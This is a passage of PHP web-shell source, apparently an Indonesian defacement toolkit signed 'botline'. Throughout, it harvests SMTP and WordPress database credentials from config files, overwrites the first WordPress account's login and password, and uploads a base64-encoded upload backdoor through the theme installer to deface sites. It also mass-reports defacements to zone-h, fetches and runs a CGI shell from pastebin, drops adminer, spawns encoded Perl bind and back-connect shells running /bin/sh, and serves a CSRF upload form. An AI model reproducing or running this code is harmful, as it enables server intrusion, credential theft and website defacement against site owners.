1421.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1422.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1423.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1424.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1425.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1426.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1427.                 echo "SMTP Host: <font color=white>$smtp_host</font><br>";
1428.                 echo "SMTP port: <font color=white>$smtp_port</font><br>";
1429.                 echo "SMTP user: <font color=white>$smtp_user</font><br>";
1430.                 echo "SMTP pass: <font color=white>$smtp_pass</font><br>";
1431.                 echo "SMTP auth: <font color=white>$smtp_auth</font><br>";
1432.                 echo "SMTP secure: <font color=white>$smtp_secure</font><br><br>";
1433.             }
1434.         }
1435.     }
1436.     $smpt_hunter = scj($dir);
1437.     echo $smpt_hunter;
1438. } elseif($_GET['do'] == 'auto_wp') {
1439.     if($_POST['hajar']) {
1440.         $title = htmlspecialchars($_POST['new_title']);
1441.         $pn_title = str_replace(" ", "-", $title);
1442.         if($_POST['cek_edit'] == "Y") {
1443.             $script = $_POST['edit_content'];
1444.         } else {
1445.             $script = $title;
1446.         }
1447.         $conf = $_POST['config_dir'];
1448.         $scan_conf = scandir($conf);
1449.         foreach($scan_conf as $file_conf) {
1450.             if(!is_file("$conf/$file_conf")) continue;
1451.             $config = file_get_contents("$conf/$file_conf");
1452.             if(preg_match("/WordPress/", $config)) {
1453.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1454.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1455.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1456.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1457.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1458.                 $prefix = $dbprefix."posts";
1459.                 $option = $dbprefix."options";
1460.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1461.                 $db = mysql_select_db($dbname);
1462.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1463.                 $result = mysql_fetch_array($q);
1464.                 $id = $result[ID];
1465.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1466.                 $result2 = mysql_fetch_array($q2);
1467.                 $target = $result2[option_value];
1468.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1469.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1470.                 echo "<div style='margin: 5px auto;'>";
1471.                 if($target == '') {
1472.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1473.                 } else {
1474.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1475.                 }
1476.                 if(!$update OR !$conn OR !$db) {
1477.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1478.                 } else {
1479.                     echo "<font color=white>sukses di ganti.</font><br>";
1480.                 }
1481.                 echo "</div>";
1482.                 mysql_close($conn);
1483.             }
1484.         }
1485.     } else {
1486.         echo "<center>
1487.         <h1>Auto Edit Title+Content WordPress</h1>
1488.         <form method='post'>
1489.         DIR Config: <br>
1490.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1491.         Set Title: <br>
1492.         <input type='text' name='new_title' value='Hacked by botline' placeholder='New Title'><br><br>
1493.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1494.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1495.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1496.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1497.         </form>
1498.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1499.         ";
1500.     }
1501. } elseif($_GET['do'] == 'zoneh') {
1502.     if($_POST['submit']) {
1503.         $domain = explode("\r\n", $_POST['url']);
1504.         $nick =  $_POST['nick'];
1505.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1506.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1507.         function zoneh($url,$nick) {
1508.             $ch = curl_init("http://www.zone-h.com/notify/single");
1509.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1510.                   curl_setopt($ch, CURLOPT_POST, true);
1511.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1512.             return curl_exec($ch);
1513.                   curl_close($ch);
1514.         }
1515.         foreach($domain as $url) {
1516.             $zoneh = zoneh($url,$nick);
1517.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1518.                 echo "$url -> <font color=white>OK</font><br>";
1519.             } else {
1520.                 echo "$url -> <font color=red>ERROR</font><br>";
1521.             }
1522.         }
1523.     } else {
1524.         echo "<center><form method='post'>
1525.         <u>Defacer</u>: <br>
1526.         <input type='text' name='nick' size='50' value='botline'><br>
1527.         <u>Domains</u>: <br>
1528.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1529.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1530.         </form>";
1531.     }
1532.     echo "</center>";
1533. } elseif($_GET['do'] == 'cgi') {
1534.     $cgi_dir = mkdir('idx_cgi', 0755);
1535.     $file_cgi = "idx_cgi/cgi.izo";
1536.     $isi_htcgi = "AddHandler cgi-script .izo";
1537.     $htcgi = fopen(".htaccess", "w");
1538.     fwrite($htcgi, $isi_htcgi);
1539.     fclose($htcgi);
1540.     $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1541.     $cgi = fopen($file_cgi, "w");
1542.     fwrite($cgi, $cgi_script);
1543.     fclose($cgi);
1544.     chmod($file_cgi, 0755);
1545.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1546. } elseif($_GET['do'] == 'fake_root') {
1547.     ob_start();
1548.     $cwd = getcwd();
1549.     $ambil_user = explode("/", $cwd);
1550.     $user = $ambil_user[2];
1551.     if($_POST['reverse']) {
1552.         $site = explode("\r\n", $_POST['url']);
1553.         $file = $_POST['file'];
1554.         foreach($site as $url) {
1555.             $cek = getsource("$url/~$user/$file");
1556.             if(preg_match("/hacked/i", $cek)) {
1557.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
1558.             }
1559.         }
1560.     } else {
1561.         echo "<center><form method='post'>
1562.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1563.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1564.         Domain: <br>
1565.         <textarea style='width: 450px; height: 250px;' name='url'>";
1566.         reverse($_SERVER['HTTP_HOST']);
1567.         echo "</textarea><br>
1568.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1569.         </form><br>
1570.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1571.     }
1572. } elseif($_GET['do'] == 'adminer') {
1573.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1574.     function adminer($url, $isi) {
1575.         $fp = fopen($isi, "w");
1576.         $ch = curl_init();
1577.               curl_setopt($ch, CURLOPT_URL, $url);
1578.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1579.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1580.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1581.               curl_setopt($ch, CURLOPT_FILE, $fp);
1582.         return curl_exec($ch);
1583.               curl_close($ch);
1584.         fclose($fp);
1585.         ob_flush();
1586.         flush();
1587.     }
1588.     if(file_exists('adminer.php')) {
1589.         echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1590.     } else {
1591.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1592.             echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1593.         } else {
1594.             echo "<center><font color=red>gagal buat file adminer</font></center>";
1595.         }
1596.     }
1597. } elseif($_GET['do'] == 'auto_dwp') {
1598.     if($_POST['auto_deface_wp']) {
1599.         function anucurl($sites) {
1600.             $ch = curl_init($sites);
1601.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1602.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1603.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1604.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1605.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1606.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1607.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1608.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1609.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1610.             $data = curl_exec($ch);
1611.                   curl_close($ch);
1612.             return $data;
1613.         }
1614.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1615.             $post = array(
1616.                    "log" => "$userr",
1617.                    "pwd" => "$pass",
1618.                    "rememberme" => "forever",
1619.                    "wp-submit" => "$wp_submit",
1620.                    "redirect_to" => "$web",
1621.                    "testcookie" => "1",
1622.                    );
1623.             $ch = curl_init($cek);
1624.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1625.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1626.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1627.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1628.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1629.                   curl_setopt($ch, CURLOPT_POST, 1);
1630.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1631.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1632.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1633.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1634.             $data = curl_exec($ch);
1635.                   curl_close($ch);
1636.             return $data;
1637.         }
1638.         $scan = $_POST['link_config'];
1639.         $link_config = scandir($scan);
1640.         $script = htmlspecialchars($_POST['script']);
1641.         $user = "botline";
1642.         $pass = "botline";
1643.         $passx = md5($pass);
1644.         foreach($link_config as $dir_config) {
1645.             if(!is_file("$scan/$dir_config")) continue;
1646.             $config = file_get_contents("$scan/$dir_config");
1647.             if(preg_match("/WordPress/", $config)) {
1648.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1649.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1650.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1651.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1652.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1653.                 $prefix = $dbprefix."users";
1654.                 $option = $dbprefix."options";
1655.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1656.                 $db = mysql_select_db($dbname);
1657.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1658.                 $result = mysql_fetch_array($q);
1659.                 $id = $result[ID];
1660.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1661.                 $result2 = mysql_fetch_array($q2);
1662.                 $target = $result2[option_value];
1663.                 if($target == '') {                
1664.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1665.                 } else {
1666.                     echo "[+] $target <br>";
1667.                 }
1668.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1669.                 if(!$conn OR !$db OR !$update) {
1670.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1671.                     mysql_close($conn);
1672.                 } else {
1673.                     $site = "$target/wp-login.php";
1674.                     $site2 = "$target/wp-admin/theme-install.php?upload";
1675.                     $b1 = anucurl($site2);
1676.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1677.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1678.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1679.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1680.                     $www = "m.php";
1681.                     $fp5 = fopen($www,"w");
1682.                     fputs($fp5,$upload3);
1683.                     $post2 = array(
1684.                             "_wpnonce" => "$anu2",
1685.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1686.                             "themezip" => "@$www",
1687.                             "install-theme-submit" => "Install Now",
1688.                             );
1689.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1690.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1691.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1692.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1693.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1694.                           curl_setopt($ch, CURLOPT_POST, 1);
1695.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1696.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1697.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1698.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1699.                     $data3 = curl_exec($ch);
1700.                           curl_close($ch);
1701.                     $y = date("Y");
1702.                     $m = date("m");
1703.                     $namafile = "id.php";
1704.                     $fpi = fopen($namafile,"w");
1705.                     fputs($fpi,$script);
1706.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1707.                            curl_setopt($ch6, CURLOPT_POST, true);
1708.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1709.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1710.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1711.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1712.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1713.                     $postResult = curl_exec($ch6);
1714.                            curl_close($ch6);
1715.                     $as = "$target/k.php";
1716.                     $bs = anucurl($as);
1717.                     if(preg_match("#$script#is", $bs)) {
1718.                         echo "[+] <font color='white'>berhasil mepes...</font><br>";
1719.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1720.                         } else {
1721.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
1722.                         echo "[!!] coba aja manual: <br>";
1723.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1724.                         echo "[+] username: <font color=white>$user</font><br>";
1725.                         echo "[+] password: <font color=white>$pass</font><br><br>";    
1726.                         }
1727.                     mysql_close($conn);
1728.                 }
1729.             }
1730.         }
1731.     } else {
1732.         echo "<center><h1>WordPress Auto Deface</h1>
1733.         <form method='post'>
1734.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1735.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by botline' required><br>
1736.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1737.         </form>
1738.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1739.         </center>";
1740.     }
1741. } elseif($_GET['do'] == 'auto_dwp2') {
1742.     if($_POST['auto_deface_wp']) {
1743.         function anucurl($sites) {
1744.             $ch = curl_init($sites);
1745.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1746.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1747.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1748.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1749.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1750.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1751.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1752.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1753.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1754.             $data = curl_exec($ch);
1755.                   curl_close($ch);
1756.             return $data;
1757.         }
1758.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1759.             $post = array(
1760.                    "log" => "$userr",
1761.                    "pwd" => "$pass",
1762.                    "rememberme" => "forever",
1763.                    "wp-submit" => "$wp_submit",
1764.                    "redirect_to" => "$web",
1765.                    "testcookie" => "1",
1766.                    );
1767.             $ch = curl_init($cek);
1768.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1769.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1770.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1771.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1772.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1773.                   curl_setopt($ch, CURLOPT_POST, 1);
1774.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1775.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1776.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1777.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1778.             $data = curl_exec($ch);
1779.                   curl_close($ch);
1780.             return $data;
1781.         }
1782.         $link = explode("\r\n", $_POST['link']);
1783.         $script = htmlspecialchars($_POST['script']);
1784.         $user = "botline";
1785.         $pass = "botline";
1786.         $passx = md5($pass);
1787.         foreach($link as $dir_config) {
1788.             $config = anucurl($dir_config);
1789.             $dbhost = ambilkata($config,"DB_HOST', '","'");
1790.             $dbuser = ambilkata($config,"DB_USER', '","'");
1791.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1792.             $dbname = ambilkata($config,"DB_NAME', '","'");
1793.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
1794.             $prefix = $dbprefix."users";
1795.             $option = $dbprefix."options";
1796.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1797.             $db = mysql_select_db($dbname);
1798.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1799.             $result = mysql_fetch_array($q);
1800.             $id = $result[ID];
1801.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1802.             $result2 = mysql_fetch_array($q2);
1803.             $target = $result2[option_value];
1804.             if($target == '') {                
1805.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1806.             } else {
1807.                 echo "[+] $target <br>";
1808.             }
1809.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1810.             if(!$conn OR !$db OR !$update) {
1811.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1812.                 mysql_close($conn);
1813.             } else {
1814.                 $site = "$target/wp-login.php";
1815.                 $site2 = "$target/wp-admin/theme-install.php?upload";
1816.                 $b1 = anucurl($site2);
1817.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1818.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1819.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1820.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1821.                 $www = "m.php";
1822.                 $fp5 = fopen($www,"w");
1823.                 fputs($fp5,$upload3);
1824.                 $post2 = array(
1825.                         "_wpnonce" => "$anu2",
1826.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1827.                         "themezip" => "@$www",
1828.                         "install-theme-submit" => "Install Now",
1829.                         );
1830.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1831.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1832.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1833.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1834.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1835.                       curl_setopt($ch, CURLOPT_POST, 1);
1836.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1837.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1838.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1839.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1840.                 $data3 = curl_exec($ch);
1841.                       curl_close($ch);
1842.                 $y = date("Y");
1843.                 $m = date("m");
1844.                 $namafile = "id.php";
1845.                 $fpi = fopen($namafile,"w");
1846.                 fputs($fpi,$script);
1847.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1848.                        curl_setopt($ch6, CURLOPT_POST, true);
1849.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1850.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1851.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1852.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1853.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1854.                 $postResult = curl_exec($ch6);
1855.                        curl_close($ch6);
1856.                 $as = "$target/k.php";
1857.                 $bs = anucurl($as);
1858.                 if(preg_match("#$script#is", $bs)) {
1859.                     echo "[+] <font color='white'>berhasil depes...</font><br>";
1860.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1861.                     } else {
1862.                     echo "[-] <font color='red'>gagal depes...</font><br>";
1863.                     echo "[!!] coba aja manual: <br>";
1864.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1865.                     echo "[+] username: <font color=white>$user</font><br>";
1866.                     echo "[+] password: <font color=white>$pass</font><br><br>";    
1867.                     }
1868.                 mysql_close($conn);
1869.             }
1870.         }
1871.     } else {
1872.         echo "<center><h1>WordPress Auto Deface V.2</h1>
1873.         <form method='post'>
1874.         Link Config: <br>
1875.         <textarea name='link' placeholder='http://target.com/botline_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1876.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by botline' required><br>
1877.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1878.         </form></center>";
1879.         }
1880.     }elseif($_GET['do'] == 'network') {
1881.     echo "<form method='post'>
1882.     <u>Bind Port:</u> <br>
1883.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1884.     <input type='submit' name='sub_bp' value='>>'>
1885.     </form>
1886.     <form method='post'>
1887.     <u>Back Connect:</u> <br>
1888.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1889.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1890.     <input type='submit' name='sub_bc' value='>>'>
1891.     </form>";
1892.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1893.     if(isset($_POST['sub_bp'])) {
1894.         $f_bp = fopen("/tmp/bp.pl", "w");
1895.         fwrite($f_bp, base64_decode($bind_port_p));
1896.         fclose($f_bp);
1897.  
1898.         $port = $_POST['port_bind'];
1899.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1900.         sleep(1);
1901.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1902.         unlink("/tmp/bp.pl");
1903.     }
1904.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1905.     if(isset($_POST['sub_bc'])) {
1906.         $f_bc = fopen("/tmp/bc.pl", "w");
1907.         fwrite($f_bc, base64_decode($bind_connect_p));
1908.         fclose($f_bc);
1909.  
1910.         $ipbc = $_POST['ip_bc'];
1911.         $port = $_POST['port_bc'];
1912.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1913.         sleep(1);
1914.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1915.         unlink("/tmp/bc.pl");
1916.     }
1917. } elseif($_GET['do'] == 'csrf') {
1918. ?>      <html>
1919. <title>CSRF EXPLOITER ONLINE</title>
1920. <center><br><br><br><br>
1921. <font color=white>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
1922. <center>
1923. <form method="post">
1924. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
1925. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
1926. <input type="submit" name="d" value="Lock!">
1927. </form>
1928. <?php
1929. //gak penting
1930.      @$url = $_POST['url'];
1931.      @$pf = $_POST['pf'];
1932.      @$d = $_POST['d'];
1933. if($d) {
1934.     //baccod
1935.    
1936.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
1937. }
1938. ?>
1939. </form>
